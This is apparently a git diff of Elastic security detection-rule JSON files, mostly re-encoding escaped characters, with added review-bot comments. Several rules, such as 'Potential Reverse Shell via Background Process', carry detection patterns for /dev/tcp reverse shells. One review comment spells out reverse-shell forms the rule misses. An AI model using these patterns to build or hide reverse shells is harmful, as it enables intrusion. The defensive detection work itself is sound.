@@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_106.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_106.json index e2bc85a8312..1066919a604 100644 --- a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_106.json 
@@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_1.json b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_1.json index 25d2c248c85..c1d16f9120e 100644 --- a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_1.json +++ b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_1.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Background Process", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0\u003e\u00261*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0>&1*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", "related_integrations": [ { "package": "endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_2.json b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_2.json index bafe0ef8598..f97a4a19478 100644 --- a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_2.json +++ b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_2.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Background Process", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0\u003e\u00261*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0>&1*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", "related_integrations": [ { "package": "endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_3.json b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_3.json index 173d36a7045..04fc9c6a520 100644 --- a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_3.json +++ b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_3.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Background Process", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0\u003e\u00261*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0>&1*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", "related_integrations": [ { "package": "endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_1.json b/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_1.json index 11fd6c57f16..3ab111d09e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_1.json +++ b/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -68,7 +68,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
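Review bot: The `process.args : "*/dev/tcp/*0>&1*"` glob in this query (unchanged by the commit, and identical in the _1 and _2 versions on the two lines above) only fires when `/dev/tcp/` and the `0>&1` redirection land in the same argv element in that order, so the file-descriptor form `exec 5<>/dev/tcp/host/port` and `/dev/udp/` variants are not covered. Consider widening the argument match, e.g. `process.args : ("*/dev/tcp/*0>&1*", "*/dev/udp/*0>&1*", "*<>/dev/tcp/*", "*<>/dev/udp/*")`, and validating the added patterns against benign `setsid`/`nohup` usage before release, since any new glob changes the false-positive profile. The files under kibana/security_rule look like generated package artifacts, so the fix presumably belongs in the upstream rule source rather than in these JSON files.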
@@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/260486ee-7d98-11ee-9599-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/260486ee-7d98-11ee-9599-f661ea17fbcd_1.json index 926b7e1f8e1..07952fbf413 100644 --- a/packages/security_detection_engine/kibana/security_rule/260486ee-7d98-11ee-9599-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/260486ee-7d98-11ee-9599-f661ea17fbcd_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_1.json b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_1.json index d7f49958db0..c161b677a2a 100644 --- a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_1.json +++ b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_1.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_2.json b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_2.json index 5034ebe8d7d..37f557064db 100644 --- a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_2.json +++ b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_2.json 
@@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_3.json b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_3.json index 5f5344b526c..3afca9331c4 100644 --- a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_3.json +++ b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_3.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_4.json b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_4.json index 84ec605e200..361847b92ed 100644 --- a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_4.json +++ b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_4.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_101.json b/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_101.json index 36de3d9f109..0fc520b2502 100644 --- a/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_101.json +++ b/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_101.json 
@@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_102.json b/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_102.json index ef0c23e0cc8..667ac89a3a1 100644 --- a/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_102.json +++ b/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_104.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_104.json index 603337b4818..a2cd76c0548 100644 --- a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_104.json +++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_104.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. 
Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' 
SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", "references": [ "https://github.com/irsl/CVE-2020-1313" 
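Review bot: The last investigation step in the `note` field, `Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.`, does not match this rule, whose query keys on a process start whose parent is `svchost.exe` with `UsoSvc` in its arguments, not on a registry write; the sentence reads as carried over from a registry-persistence guide. Suggest `...to the target host around the time of the suspicious process start.` The same wording is present in the _105 and _106 versions of the file below. This _104 version also still carries the `$osquery_0`–`$osquery_3` placeholders where _105 has the expanded `!{osquery{...}}` blocks, presumably an older build format, but worth confirming it renders in the stack versions this package targets.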
@@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_105.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_105.json index 5a40b140692..f8c823a9721 100644 --- a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_105.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
